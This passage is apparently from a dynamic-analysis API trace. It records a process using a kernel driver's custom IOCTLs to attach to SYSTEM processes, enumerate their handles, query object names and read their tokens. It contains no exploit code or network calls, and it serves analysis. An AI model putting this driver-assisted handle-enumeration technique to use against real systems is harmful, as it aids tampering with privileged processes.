ObjectNameInfo=0xfffffa8002f55044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.066] ObfDereferenceObject (Object=0xfffff8a001745540) returned 0x1 [0132.066] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.067] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.067] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.067] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.067] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.067] PsAcquireProcessExitSynchronization () returned 0x0 [0132.067] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.067] ObReferenceObjectByHandle (in: Handle=0x540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001789ce0, HandleInformation=0x0) returned 0x0 [0132.067] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.067] PsReleaseProcessExitSynchronization () returned 0x2 [0132.067] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.565] ObQueryNameString (in: Object=0xfffff8a001789ce0, ObjectNameInfo=0xfffffa8002893044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002893044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.565] ObfDereferenceObject (Object=0xfffff8a001789ce0) returned 0x1 [0132.565] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.565] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0xc8 [0132.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0132.566] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80018b85a0, HandleInformation=0x0) returned 0x0 [0132.566] ObOpenObjectByPointer (in: Object=0xfffffa80018b85a0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000810) returned 0x0 [0132.566] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x71 [0132.566] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000810, DesiredAccess=0x8, TokenHandle=0xfffffa8003aa5600 | out: TokenHandle=0xfffffa8003aa5600*=0xc4) returned 0x0 [0132.566] ZwClose (Handle=0xffffffff80000810) returned 0x0 [0132.566] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.566] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0132.566] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0132.569] CloseHandle (hObject=0xc4) returned 1 [0132.569] CloseHandle (hObject=0xc8) returned 1 [0132.569] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.569] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0132.569] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.569] PsAcquireProcessExitSynchronization () returned 0x0 [0132.569] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0) [0132.569] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003554cb0, HandleInformation=0x0) returned 0x0 [0132.569] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.569] PsReleaseProcessExitSynchronization () returned 0x2 [0132.569] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0132.570] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002540344, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002540344, ReturnLength=0xfffff88005163508) returned 0x0 [0132.570] ObfDereferenceObject (Object=0xfffffa8003554cb0) returned 0x1 [0132.570] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.570] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.570] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0132.570] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.570] PsAcquireProcessExitSynchronization () returned 0x0 [0132.570] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0) [0132.570] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800294d590, HandleInformation=0x0) returned 0x0 [0132.570] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.570] PsReleaseProcessExitSynchronization () returned 0x2 [0132.570] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0132.570] ObQueryNameString (in: Object=0xfffffa800294d590, ObjectNameInfo=0xfffffa80025ae044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025ae044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.570] ObfDereferenceObject (Object=0xfffffa800294d590) returned 0x1 [0132.570] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.570] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.570] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0132.570] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.570] PsAcquireProcessExitSynchronization () returned 0x0 [0132.570] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0) [0132.571] ObReferenceObjectByHandle (in: Handle=0xcc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003589f20, HandleInformation=0x0) returned 0x0 [0132.571] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.571] PsReleaseProcessExitSynchronization () returned 0x2 [0132.571] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0132.571] ObQueryNameString (in: Object=0xfffffa8003589f20, ObjectNameInfo=0xfffffa8002600044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002600044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.571] ObfDereferenceObject (Object=0xfffffa8003589f20) returned 0x2 [0132.571] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.571] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.571] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.571] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0132.571] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.571] PsAcquireProcessExitSynchronization () returned 0x0 [0132.571] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0) [0132.571] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003589070, HandleInformation=0x0) returned 0x0 [0132.571] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.571] PsReleaseProcessExitSynchronization () returned 0x2 [0132.571] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0132.571] ObQueryNameString (in: Object=0xfffffa8003589070, ObjectNameInfo=0xfffffa8002640044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002640044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.572] ObfDereferenceObject (Object=0xfffffa8003589070) returned 0x1 [0132.572] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.572] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.572] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.572] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0132.572] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.572] PsAcquireProcessExitSynchronization () returned 0x0 [0132.572] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0) [0132.572] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036fb8d0, HandleInformation=0x0) returned 0x0 [0132.572] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.572] PsReleaseProcessExitSynchronization () returned 0x2 [0132.572] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0132.572] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002656044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002656044, ReturnLength=0xfffff88005163508) returned 0x0 [0132.572] ObfDereferenceObject (Object=0xfffffa80036fb8d0) returned 0x1 [0132.572] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.572] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.572] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.572] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0132.572] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.572] PsAcquireProcessExitSynchronization () returned 0x0 [0132.572] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0) [0132.572] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003756a20, HandleInformation=0x0) returned 0x0 [0132.572] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.573] PsReleaseProcessExitSynchronization () returned 0x2 [0132.573] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0132.573] ObQueryNameString (in: Object=0xfffffa8003756a20, ObjectNameInfo=0xfffffa800267b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800267b044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.573] ObfDereferenceObject (Object=0xfffffa8003756a20) returned 0x2 [0132.573] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.573] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.573] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.573] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0132.573] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.573] PsAcquireProcessExitSynchronization () returned 0x0 [0132.573] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0) [0132.573] ObReferenceObjectByHandle (in: Handle=0x130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003766a50, HandleInformation=0x0) returned 0x0 [0132.573] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.573] PsReleaseProcessExitSynchronization () returned 0x2 [0132.573] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0132.573] ObQueryNameString (in: Object=0xfffffa8003766a50, ObjectNameInfo=0xfffffa800267c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800267c044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.573] ObfDereferenceObject (Object=0xfffffa8003766a50) returned 0x2 [0132.573] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.573] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.574] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.574] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0132.574] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.574] PsAcquireProcessExitSynchronization () returned 0x0 [0132.574] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0) [0132.574] ObReferenceObjectByHandle (in: Handle=0x134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003767ba0, HandleInformation=0x0) returned 0x0 [0132.574] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.574] PsReleaseProcessExitSynchronization () returned 0x2 [0132.574] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0132.574] ObQueryNameString (in: Object=0xfffffa8003767ba0, ObjectNameInfo=0xfffffa8002689044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002689044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.574] ObfDereferenceObject (Object=0xfffffa8003767ba0) returned 0x2 [0132.574] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.574] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.574] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.574] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0132.574] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.574] PsAcquireProcessExitSynchronization () returned 0x0 [0132.574] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0) [0132.574] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003760f20, HandleInformation=0x0) returned 0x0 [0132.574] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.574] PsReleaseProcessExitSynchronization () returned 0x2 [0132.574] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0132.574] ObQueryNameString (in: Object=0xfffffa8003760f20, ObjectNameInfo=0xfffffa800268a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800268a044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.575] ObfDereferenceObject (Object=0xfffffa8003760f20) returned 0x2 [0132.575] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.575] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.575] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.575] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0132.575] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.575] PsAcquireProcessExitSynchronization () returned 0x0 [0132.575] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880051635d0) [0132.575] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003769e20, HandleInformation=0x0) returned 0x0 [0132.575] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.575] PsReleaseProcessExitSynchronization () returned 0x2 [0132.575] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0132.575] ObQueryNameString (in: Object=0xfffffa8003769e20, ObjectNameInfo=0xfffffa8002c25044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002c25044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.575] ObfDereferenceObject (Object=0xfffffa8003769e20) returned 0x2 [0132.575] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.575] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0xc8 [0132.575] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0132.575] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80018b95d0, HandleInformation=0x0) returned 0x0 [0132.576] ObOpenObjectByPointer (in: Object=0xfffffa80018b95d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000810) returned 0x0 [0132.576] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.576] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000810, DesiredAccess=0x8, TokenHandle=0xfffffa8003aa5600 | out: TokenHandle=0xfffffa8003aa5600*=0xc4) returned 0x0 [0132.576] ZwClose (Handle=0xffffffff80000810) returned 0x0 [0132.576] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.576] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0132.576] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0132.578] CloseHandle (hObject=0xc4) returned 1 [0132.578] CloseHandle (hObject=0xc8) returned 1 [0132.578] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.578] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0132.578] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.578] PsAcquireProcessExitSynchronization () returned 0x0 [0132.578] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.578] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003558f20, HandleInformation=0x0) returned 0x0 [0132.578] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.579] PsReleaseProcessExitSynchronization () returned 0x2 [0132.579] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.579] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f1f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f1f044, ReturnLength=0xfffff88005163508) returned 0x0 [0132.579] ObfDereferenceObject (Object=0xfffffa8003558f20) returned 0x1 [0132.579] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.579] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.579] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.579] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0132.579] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.579] PsAcquireProcessExitSynchronization () returned 0x0 [0132.579] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.579] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0044997a0, HandleInformation=0x0) returned 0x0 [0132.579] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.579] PsReleaseProcessExitSynchronization () returned 0x2 [0132.579] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.579] ObQueryNameString (in: Object=0xfffff8a0044997a0, ObjectNameInfo=0xfffffa8002f63044, Length=0x800, ReturnLength=0xfffff88005163550 | out: 